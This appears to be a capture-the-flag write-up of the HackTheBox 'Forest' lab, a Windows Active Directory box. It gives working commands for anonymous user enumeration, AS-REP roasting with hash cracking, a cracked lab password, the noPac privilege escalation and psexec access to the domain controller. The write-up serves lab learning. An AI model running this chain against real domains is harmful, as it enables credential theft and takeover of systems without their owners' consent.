Summary
An easy box containing AD environment with vulnerabilities like :
- Kerberose Asreproast
- NOPac Vulnerability (NoPac relies on changing the SamAccountName of a computer account to the name of a domain controller)
Setup
mkdir -p ~/ctf/HackTheBox/forest/scans; cd ~/ctf/HackTheBox/forest
IP Address: 10.10.10.161
echo "10.10.10.161 forest.htb" | sudo tee -a /etc/hosts
10.10.10.161 forest.htb
Enumeration
nmap -sC -sV -Pn -p- forest.htb -oN scans/nmap -vv
nmap -sC -sV -p- -vv -T5 --min-rate 2500 -oN scans/nmap_2 forest.htb
# nmap findings
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2024-10-06 15:48:22Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds syn-ack Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack .NET Message Framing
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49671/tcp open msrpc syn-ack Microsoft Windows RPC
49678/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49679/tcp open msrpc syn-ack Microsoft Windows RPC
49686/tcp open msrpc syn-ack Microsoft Windows RPC
49705/tcp open msrpc syn-ack Microsoft Windows RPC
49974/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2024-10-06T08:49:15-07:00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 32753/tcp): CLEAN (Couldn't connect)
| Check 2 (port 57085/tcp): CLEAN (Couldn't connect)
| Check 3 (port 44587/udp): CLEAN (Timeout)
| Check 4 (port 2270/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2024-10-06T15:49:15
|_ start_date: 2024-10-06T08:20:41
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_clock-skew: mean: 2h15m22s, deviation: 4h02m31s, median: -4m39s
Using SMB enumeration using crackmapexec and null account anonymous login we enumerate users
cme smb 10.10.10.161 -u '' -p '' --users
Administrator
Guest
krbtgt
DefaultAccount
$331000-VK4ADACQNUCA
SM_2c8eef0a09b545acb
SM_ca8c2ed5bdab4dc9b
SM_75a538d3025e4db9a
SM_681f53d4942840e18
SM_1b41c9286325456bb
SM_9b69f1b9d2cc45549
SM_7c96b981967141ebb
SM_c75ee099d0a64c91b
SM_1ffab36a2f5f479cb
HealthMailboxc3d7722
HealthMailboxfc9daad
HealthMailboxc0a90c9
HealthMailbox670628e
HealthMailbox968e74d
HealthMailbox6ded678
HealthMailbox83d6781
HealthMailboxfd87238
HealthMailboxb01ac64
HealthMailbox7108a4e
HealthMailbox0659cc1
sebastien
lucinda
svc-alfresco
andy
marks
santi
[password spraying and bruteforcing didnt work (Same password as username) ]
Kerberos ASREPRoast
asreproast is a user accounts with Kerberos pre-authentication required attribute not set. This allows attackers to request authentication for a user from the Domain Controller (DC) without needing the user’s password. The DC then responds with a message encrypted with the user’s password-derived key, which attackers can attempt to crack offline to discover the user’s password.
GetNPUsers.py htb.local/ -usersfile user -format hashcat -outputfile hash_asrep -no-pass
Cracking the hash using hashcat -m 18200 hash_asrep /usr/share/wordlists/rockyou.txt
we get svc-alfresco:s3rvice
We check for known low hanging fruits like Nopac and Petitpotam
root flag
Credential Cache
A credential cache (or “ccache”) contains the Kerberos credential although it remains valid and, typically, while the user’s session lasts, so that multiple service authentication (e.g. connecting to a web or mail server more than once) does not involve contacting the KDC at every time.
A credential cache usually contains one initial ticket which is obtained using a password or another form of identity verification. If this ticket is a ticket-granting ticket, it can be used to obtain additional credentials without the password. Because the credential cache does not store the password, less long-term damage can be done to the user’s account if the machine is compromised.
A credentials cache stores a default client principal name, set when the cache is created. This is the name shown at the top of the klist
Using No Pac
python noPac.py htb.local/'svc-alfresco':'s3rvice' -dc-ip 10.10.10.161 -use-ldap
we get kerboros ticket
using psexec.py psexec.py -dc-ip 10.10.10.161 -target-ip 10.10.10.161 -no-pass -k htb.local/Administrator@forest.htb.local
Wrap Up
- In this “Forest” box, enumeration reveals a Windows Active Directory environment with common services exposed, such as Kerberos and LDAP. Using ASREPRoasting, we cracked the password for the svc-alfresco account, leading to exploitation via the NoPac vulnerability, which allowed privilege escalation by obtaining a Kerberos ticket. With this, we achieved administrator access to the Domain Controller, eventually obtaining the root flag through a psexec connection